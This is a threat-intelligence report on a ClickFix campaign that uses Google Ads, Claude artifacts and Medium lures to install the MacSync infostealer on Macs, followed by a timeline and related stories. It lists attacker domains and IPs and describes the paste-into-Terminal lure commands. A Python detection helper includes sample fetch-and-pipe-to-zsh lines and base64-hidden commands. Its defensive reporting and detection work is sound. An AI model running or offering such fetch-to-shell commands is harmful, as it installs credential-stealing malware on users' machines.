ClickFix Campaign Abuses Claude Artifacts and Google Ads to Deliver macOS Infostealers
Threat actors are running a ClickFix-style social-engineering campaign that abuses Google sponsored search results to funnel macOS users to malicious content hosted on legitimate platforms, including Anthropic Claude public artifacts (claude.ai) and Medium pages impersonating trusted sources (e.g., Apple Support). The lures target common search queries such as “online DNS resolver,” “macOS CLI disk space analyzer,” and “HomeBrew,” then instruct victims to paste and run Terminal commands that decode and execute the payload (e.g., echo "..." | base64 -D | zsh or curl ... | zsh). Researchers (Moonlock Lab/MacPaw and AdGuard) reported that the malicious Claude artifact accumulated roughly 12,300 to 15,600 views, indicating significant exposure (different reports cite 10,000+ and 15,000+ potential victims).
The payloads deliver macOS information-stealing malware, including MacSync, which collects data such as Keychain credentials, browser data, and cryptocurrency wallet files. Reported tradecraft includes downloading and executing a shell script, using an AppleScript component for theft, staging stolen data into /tmp/osalogging.zip, and exfiltrating via HTTP POST to attacker infrastructure (e.g., a2abotnet[.]com/gate, with C2 paths like a2abotnet[.]com/dynamic). The malware attempts to blend in by spoofing legitimate macOS browser User-Agent strings and includes retry logic for large/chunked uploads, then removes staging artifacts to reduce forensic traces.
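As an added illustration of the defender side (example code, not from the reports cited above), the following Python triage helper scans shell-history lines for the two command shapes the lures use: a base64 blob echoed into base64 -D and piped to zsh, and a curl download piped straight into a shell. It decodes the embedded base64 so an analyst can see the command it hides; the sample history and the .invalid domains are constructed placeholders.

```python
import base64
import binascii
import re
from dataclasses import dataclass
from typing import List, Optional

# Interpreters that turn piped text into execution; a pipeline ending in one of
# these is the ClickFix shape described above (curl ... | zsh, ... | base64 -D | zsh).
SHELL_SINKS = {"sh", "bash", "zsh", "osascript"}
# echo "<base64>" | base64 -D   (macOS base64 uses -D; GNU coreutils uses -d/--decode)
B64_ECHO = re.compile(r'echo\s+["\']?([A-Za-z0-9+/=]{16,})["\']?\s*\|\s*base64\s+(?:-D|-d|--decode)')


@dataclass
class Finding:
    command: str
    reason: str
    decoded: str = ""  # hidden command recovered from the base64 stage, if any


def pipes_into_shell(command: str) -> bool:
    """True if the last stage of a pipeline is a shell interpreter."""
    stages = [s.strip() for s in command.split("|")]
    if len(stages) < 2 or not stages[-1]:
        return False
    prog = stages[-1].split()[0].rsplit("/", 1)[-1]  # strip any path prefix
    return prog in SHELL_SINKS


def inspect_command(command: str) -> Optional[Finding]:
    """Classify one history line; decodes embedded base64 to show what it hides."""
    m = B64_ECHO.search(command)
    if m and pipes_into_shell(command):
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except binascii.Error:
            decoded = ""  # malformed blob: still flag the decode-to-shell shape
        return Finding(command, "base64-decode-to-shell", decoded)
    if re.search(r"\b(curl|wget)\b", command) and pipes_into_shell(command):
        return Finding(command, "remote-fetch-to-shell")
    return None


def scan_history(lines: List[str]) -> List[Finding]:
    return [f for f in (inspect_command(line) for line in lines) if f]


# Constructed triage sample (not real history); .invalid domains are placeholders.
HIDDEN = base64.b64encode(b"curl -fsSL https://dl.example.invalid/i | zsh").decode()
SAMPLE_HISTORY = [
    "brew install ncdu",
    f'echo "{HIDDEN}" | base64 -D | zsh',
    "curl -fsSL https://support.example.invalid/fix.sh | zsh",
    "ls -la ~/Library/Keychains",
]

if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f.reason, "|", f.command[:60], "|", f.decoded)
```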
Timeline
Apr 22, 2026
Fake Claude download ad delivers new macOS ClickFix payload
On 2026-04-22, researchers documented a malicious Google ad that redirected users to a fake Claude download page at cladesktop.gitlab.io, where a ClickFix-style flow delivered a password-protected ZIP containing a Mach-O arm64 malware sample saved as /tmp/helper. The infection chain used newly registered infrastructure including arkypc.com for payload delivery and communicated with a command-and-control server at 45.94.47.204:80.
Feb 13, 2026
Researchers report campaign reach exceeded 15,000 views
Investigators observed that at least one malicious Claude guide had accumulated significant exposure, with reported view counts ranging from more than 10,000 to over 15,000. This indicated the campaign had reached a large pool of potential macOS victims through promoted search results and trusted hosting platforms.
Feb 13, 2026
Researchers link multiple campaign variants to the same actor
Analysis by Moonlock Lab and AdGuard found the Claude Artifact and Medium impersonation variants likely came from the same threat actor because both retrieved second-stage payloads from the same command-and-control infrastructure. Researchers also noted the campaign fit a broader pattern of threat actors abusing public AI-sharing features previously seen with ChatGPT and Grok.
Feb 13, 2026
MacSync infostealer delivered through Claude and Medium lures
Victims who executed the copied shell commands downloaded a loader that installed the MacSync infostealer. The malware used AppleScript and other built-in macOS tools to steal Keychain data, browser information, and cryptocurrency wallet data, package it into /tmp/osalogging.zip, and exfiltrate it to attacker infrastructure including a2abotnet[.]com/gate.
Feb 13, 2026
Threat actors launch ClickFix campaign targeting macOS users
A financially motivated campaign began using Google Ads and SEO-poisoned search results to lure macOS users to fake support or how-to pages. The pages abused trusted platforms including Anthropic Claude Artifacts and Medium to socially engineer victims into pasting malicious Terminal commands.
Related Stories

ClickFix Campaigns Deliver MacSync Infostealer to macOS Users
Researchers reported **three ClickFix campaigns** that used social engineering rather than software exploitation to infect **macOS** users with the **MacSync** infostealer. The activity evolved over several months, beginning with fake sponsored search results for an **OpenAI Atlas** browser download hosted on fraudulent pages, then shifting to malicious workflows that abused shared **ChatGPT** conversations and GitHub-themed landing pages to make the infection chain appear legitimate. In each case, victims were instructed to open **Terminal** and paste commands, allowing the malware to be installed through user action instead of a traditional exploit. The most recent campaign introduced a more advanced **MacSync** variant with **multi-stage loaders**, **dynamic AppleScript payloads**, and **in-memory execution** intended to improve evasion and persistence. Reporting indicates the later activity targeted users in **Belgium, India, and parts of North and South America**, while researchers said it remains unclear whether all three campaigns were conducted by the same threat actor. The findings underscore a broader trend of attackers adapting **ClickFix** lures for macOS, using trusted platforms, sponsored links, and fake AI-tool installers to steal credentials and other sensitive data while bypassing file-based defenses by persuading users to execute the attack themselves.
Yesterday
ClickFix Social Engineering Drives Multi-Platform Malware Delivery
Security researchers reported multiple active campaigns using **ClickFix** social engineering—fake error dialogs or verification prompts that trick users into manually running attacker-supplied commands—to bypass browser and download protections and establish an initial foothold. In one enterprise case investigated by **CERT Polska (cert.pl)**, victims were lured via compromised websites showing a fake CAPTCHA/“fix” prompt that instructed them to paste and run a **PowerShell** command via `Win+R`; the script then downloaded a dropper and enabled rapid follow-on activity that can scale to **enterprise-wide compromise**, including deployment of secondary malware such as **Latrodectus** and **Supper** for data theft, lateral movement, and potential ransomware staging. A separate ClickFix operation targeted **macOS developers** by cloning the *Homebrew* site on typosquatted infrastructure; the “install” command was subtly altered to fetch content from `raw.homabrews.org` instead of `raw.githubusercontent.com`, leading to **Cuckoo Stealer** deployment and credential harvesting via repeated password prompts using macOS Directory Services, with related domains tied to shared hosting at **`5.255.123.244`**. ClickFix was also observed as the initial execution mechanism for the resurfaced **Matanbuchus 3.0** MaaS loader, which uses deceptive copy/paste prompts and **silent MSI** execution (via `msiexec`) to deliver a new payload, **AstarionRAT**, enabling capabilities including credential theft and **SOCKS5** proxying; operators were reported to move laterally quickly (including toward domain controllers), consistent with ransomware or data-exfiltration objectives.
1 month ago
ClickFix macOS Campaign Abuses Script Editor to Deploy Atomic Stealer
Researchers identified a **ClickFix-style** campaign targeting macOS users that swaps Terminal-based execution for **Script Editor** to bypass newer Apple protections. Victims are lured to fake Apple-themed pages such as “Reclaim disk space on your Mac,” which invoke the `applescript://` URL scheme and open Script Editor with a pre-filled AppleScript. If the user runs it, the script conceals a malicious shell command that decodes a URL, uses `curl` with TLS certificate validation disabled, and pipes the response directly into `zsh` for in-memory execution. The activity, discovered by **Jamf Threat Labs**, ultimately downloads and launches a Mach-O variant of **Atomic Stealer**, an infostealer built to harvest browser credentials, saved passwords, cryptocurrency wallets, and other sensitive data from macOS systems. Researchers said the campaign appears to be an adaptation to Apple’s paste-command scanning protections added in macOS 26.4 for Terminal abuse; while newer macOS versions also warn about unidentified scripts, the attack can still succeed if users follow the prompts. Reported infrastructure tied to the campaign includes `dryvecar.com`, `storage-fixes.squarespace.com`, and `cleanupmac.mssg.me`.
3 weeks ago